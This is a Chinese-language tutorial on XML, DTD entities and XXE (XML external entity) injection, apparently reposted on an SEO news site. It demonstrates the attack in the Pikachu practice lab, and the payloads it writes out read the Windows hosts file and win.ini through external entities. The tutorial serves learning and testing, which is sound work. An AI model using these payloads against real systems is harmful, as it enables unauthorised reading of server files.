当前位置: 首页 > news >正文

湖北省住房城乡建设厅网站关键词优化的策略有哪些

news 2025/8/1 19:16:19
湖北省住房城乡建设厅网站,关键词优化的策略有哪些,安卓系统优化app,做期权关注哪个网站目录XML基础概念XML数据格式DTD基础定义DTD作用分类DTD实体实体的分类DTD元素XXE漏洞介绍实操如何探测xxe漏洞XML基础 概念 什么是XML 是一种可扩展标记语言 (Extensible Markup Language, XML) ,标准通用标记语言的子集,可以用来标记数据、定义数据类型…

目录

  • XML基础
    • 概念
    • XML数据格式
  • DTD基础
    • 定义
    • DTD作用
    • 分类
    • DTD实体
    • 实体的分类
    • DTD元素
  • XXE漏洞
    • 介绍
    • 实操
    • 如何探测xxe漏洞

XML基础

概念

  • 什么是XML

    • 是一种可扩展标记语言 (Extensible Markup Language, XML) ,标准通用标记语言的子集,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

  • 特点

    • 是一种标记语言
    • 被设计来进行数据传输
    • 可以自定义标签
    • 具有层级结构
    • 具有自我描述性

XML数据格式

声明

<?xml version="1.0" encoding="UTF-8" ?>

元素/节点
(1)根节点: 有且只有一个根元素
(2)子节点: 可以嵌套,可以重复
(3)每个节点必须成对出现,空节点也必须成对出现
属性
(1)每个元素/节点可以有多个属性
(2)属性以键值对的方式出现:名称=“值”。属性的值添加双引号,多个属性以空格分开。

注释: <!--  注释内容  -->

DTD基础

定义

DTD全称是The document type definition,即是文档类型定义,可定义合法的XML文档
它使用一系列合法的元素来定义文档的结构。DTD可以被成行的声明于XML

DTD作用

1.一个应用程序keyishiyongDTD来确认收到的XML数据是有效的
2.每一个XML文件可以携带一个自身格式的描述
3.不同组织的人可以使用一个通用DTD来交换数据

分类

DTD分为:内部DTD、外部DTD、共有DTD

  • 内部DTD
    • 存在xml文档中的
      在这里插入图片描述
      DOCTYPE:DTD声明,对note进行说明
      以上
<!DOCTYPE NOTE [
- ]>

都为DTD

  • 外部DTD
    在这里插入图片描述
    可以看出把DTD写到了"note.dtd"中

  • 共有DTD

<!DOCTYPE taglib PUBLIC "-//Sun Microsystems,Inc.//DTD JSP Tag Library 1.2//EN""http://java.sun.com/dtd/web-jsplibrary_1_2.dtd">

DTD实体

实体的概念:实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体引用是对实体的引用。

实体可在内部或外部进行声明。

实体的分类

分类:内部实体,外部实体、参数实体

  • 内部实体:
<!ENTITY实体名称 "实体的值">
  • 外部实体:
<!ENTITY实体名称SYSTEM "URL">
  • 参数实体
<!ENTITY % 实体名称 [SYSTEM] "URL"> 
<!ENTITY % TAG_NAME "姓名|EMAIL|电话|地址">
<!ELEMENT 个人信息 (%TAG_NAME; |生日)>
<!ELEMENT 客户信息 (%TAG_NAME; |公司名)>

DTD元素

声明一个元素<!ENTITY 元素名称 类别><!ELEMENT 元素名称(元素内容)>
空元素<!ENTITY 元素名称 EMPTY><!ELEMENT <br> EMPTY> <br/>
只有PCDATA的元素<!ENTITY 元素名称 (#PCDATA)><!ELEMENT from (#PCDATA)>
带任何内容的元素<!ENTITY 元素名称 ANY><!ELEMENT note ANY>
带有子元素(序列)的元素<!ENTITY 元素名称 (子元素名称1,子元素名称2,........)><!ELEMENT note(to,from,heading,body)>

XXE漏洞

介绍

  • XXE -“xml external entity injection”
  • “xml外部实体注入漏洞”

利用xxe漏洞可以进行拒绝服务攻击(DDos),文件读取,命令(代码)执行,SQL(XSS)注入,等

一般的xml:

第一部分:XML声明部分

<?xml version="**"?>

第二部分:文档类型定义 DTD

<!--定义此文档是note类型的文档-->
<!DOCTYPE note[
<!--外部实体声明-->
<!ENTITY entity-name SYSTEM "URI/URL">
]>

第三部分:文档元素

<note>
<to>nuc</to>
<from>grade20</from>
<head>2013040212</head>
<body>wpp</body>
</note>

实操

进入pikachu靶场
提交一个xml

<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE note [ <!ENTITY hack "Edison.W"> ]> <name>&hack;</name>

在这里插入图片描述
外部实体引入攻击载荷使其访问host文件

<?xml version="1.0"?>
<!DOCTYPE ANY[ 
<!ENTITY f SYSTEM "file:///C://Windows/System32/drivers/etc/hosts">
]>
<x>&f;</x>

在这里插入图片描述
再来一个,我们这次访问win.ini

<?xml version="1.0"?>
<!DOCTYPE a [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<xml>&xxe;</xml>

在这里插入图片描述

如何探测xxe漏洞

  • 抓包,如果是xml格式的body,则发送一个<元素>数据</元素>
  • 能回显,就可能存在XXE漏洞
http://www.mmbaike.com/news/72942.html

相关文章:

  • wordpress 动画seo管理软件
  • 做网站现在赚钱吗深圳谷歌seo公司
  • 晋中市建设局网站百度怎么创建自己的网站
  • 网站用什么开发做电商需要什么条件
  • 免费建网站软件下载手机网络营销公司哪家可靠
  • 网站建设确认函百度推广在线客服
  • 怎样设计一个网站平台简单的网页设计
  • 烟台网站建设首推企汇互联见效付款互联网营销方式有哪些
  • 网站logo上传汕头网站优化
  • 西安 北郊网站建设网站建设小程序开发
  • 网站建设的大概费用杭州seo技术培训
  • 全国设计师网站注册网站在哪里注册
  • 电子商务网站开发wbs网络营销十大成功案例
  • 网站例子网页设计首页制作
  • 上海建设公司sem和seo是什么意思
  • 网站工信部备案号免备案域名
  • 现在国外还有新冠疫情吗河北seo技术
  • 域名网站建设搜索关键词分析
  • 重庆最火十大景区排名一键优化大师下载
  • 网站创建需要多少钱东莞网络推广营销
  • 青岛开发区 网站建设广州营销课程培训班
  • wordpress最新版关键词优化公司靠谱推荐
  • 昆明做门户网站的公司保定关键词排名推广
  • 网站免费建站厂商定制品牌广告和效果广告的区别
  • js与asp.net做的网站新产品市场推广方案
  • 山东电力建设第一工程公司网站小学生一分钟新闻播报
  • 游戏开奖网站建设千瓜数据
  • 北京做网站建设公司广州百度首页优化
  • 好网站建设推广百度百科
  • 网站制作 系统定制网站诊断工具